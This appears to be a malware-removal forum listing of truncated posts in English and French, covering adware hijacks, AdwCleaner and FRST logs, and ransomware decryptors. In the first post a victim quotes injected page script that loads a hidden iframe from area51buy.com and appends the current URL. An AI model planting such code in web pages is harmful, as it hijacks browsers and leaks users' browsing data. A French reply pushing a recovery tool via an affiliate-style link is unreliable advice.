area51buy.com hijack

AdwCleaner was unable to fix it. MalwareBytes also did not help. When I try to open gearbest.com in firefox I see a blank page. The source of the page:

 

<!DOCTYPE html>
<html>
<body>
	<script type="text/javascript">
	var url=location.href;
	var ifr = document.createElement('iframe'); 
    ifr.style.display = 'none'; 
    ifr.src ='//area51buy.com/'+'#'+url;
    document.body.appendChild(ifr...

Re: Impossible de supprimer Nophilos.exe

Bonjour,

Attention : tu dois prendre la version compatible avec ton système : 32 ou 64 bits.

32 ou 64 bits - Comment savoir ?

  • Lance FRST (Sous Windows Vista/7/8/10, clic droit sur FRST > Exécuter en tant qu'administrateur).
  • Coche la case Addition.txt.
  • Clique sur le bouton Analyser.
  • Une fois le scan terminé, deux rapports FRS...

Re: Can anyone help me identify if any of these deleted registry keys are essential

Greetings,

First of all, sorry for the late answer.

Can you share the scan logfile as well? Thanks.

Regards.


cocochepeau, 2017-09-19 06:55:31 (UTC)

# AdwCleaner 7.0.2.1 - Logfile created on Sun Sep 10 01:05:26 2017 # Updated on 2017/29/08 by Malwarebytes  # Database: 09-08-2017.1 # Running on Windows 7 Home Basic (X64) # Mode: scan # Support: https://www.malwarebytes.com/support

***** [...

Can anyone help me identify if any of these deleted registry keys are essential for windows?

# AdwCleaner 7.0.2.1 - Logfile created on Sun Sep 10 01:06:01 2017 # Updated on 2017/29/08 by Malwarebytes  # Running on Windows 7 Home Basic (X64) # Mode: clean # Support: https://www.malwarebytes.com/support

***** [ Services ] *****

No malicious services deleted.

***** [ Folders ] *****

Deleted: C:\Users\lenovo\AppData\Local\Bundled software uninstaller Deleted: C:\Users\lenovo\AppData\Ro...

Re: redémarrage impossible après passage de tweaning

Bonjour,

Avez-vous la possibilité d'utiliser un autre clavier ? Vous pouvez aussi tenter d'utiliser le clavier d'accessibilité de Windows. Vous pouvez vous rendre sur cette page pour savoir comment y accéder.

Ensuite, tentez la restauration d'un point de restauration système. La marche à suivre est décrite sur cette page, dans la section "Restaurer à partir d’un point de restauration système"...

Re: extansion .no_more_ransom

Future here! Hopefully, you will be able to understand this in English. Decided, to surf some older posts and add some information to what we now know. 2 Vendors currently have a decryptor for it as part of the "No More Ransom" project (Not related to this extension, this extension is just mocking). You can find Kaspersky's and McAfee's versions respectively. Additionally, you can read more abo...

Re: Jaff virus?

Utilisez Data Recovery Pro ou Rakhni decryptor pour restaurer les fichiers cryptés par le rançongiciel Jaff. Data Recovery Pro est unun outil automatique qui peut effectuer ce travail à votre place. Vous pouvez il ou Rahini décrypteur conçu par Kaspersky Lab en cliquant ici: http://www.2-spyware.com/remove-jaff-ransomware-virus.html

N'oubliez d'exécuter une analyse supplémentaire de votre syst...

DNS RESOLVER IMPLEMENTED AS A WINDOWS SERVICE (MAIN FEATURE INTERCEPTION AND REDIRECTION TO ANOTHER HOSTED DNS SERVER) with WinDivert

Good day  forum    Programming environment  Visual STUDIO  2015, Windows  Driver , and WinDivert (https://github.com/basil00/Divert)

Am a research student on DNS RESOLVER IMPLEMENTED AS A WINDOWS SERVICE  (MAIN FEATURE INTERCEPTION AND REDIRECTION TO ANOTHER HOSTED DNS SERVER)  with WinDivert     I just started  looking at WinDivert (https://github.com/basil00/Divert)      My Programming envir...

Re: Start\Windows icon

Hmm.... You could try getting a bootable Windows10 USB/CD and try a general repair function, see if that helps you in any way. You can also try a recovery with the bootable drive.

Re: Version 7 FPs (262 elements)

Hello,

  1. Download FRST 
  2. Download fixlist.txt file and save it to the Desktop.

NOTE. It's important that both files, FRST/FRST64 and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.

Run FRST/FRST64 and press the...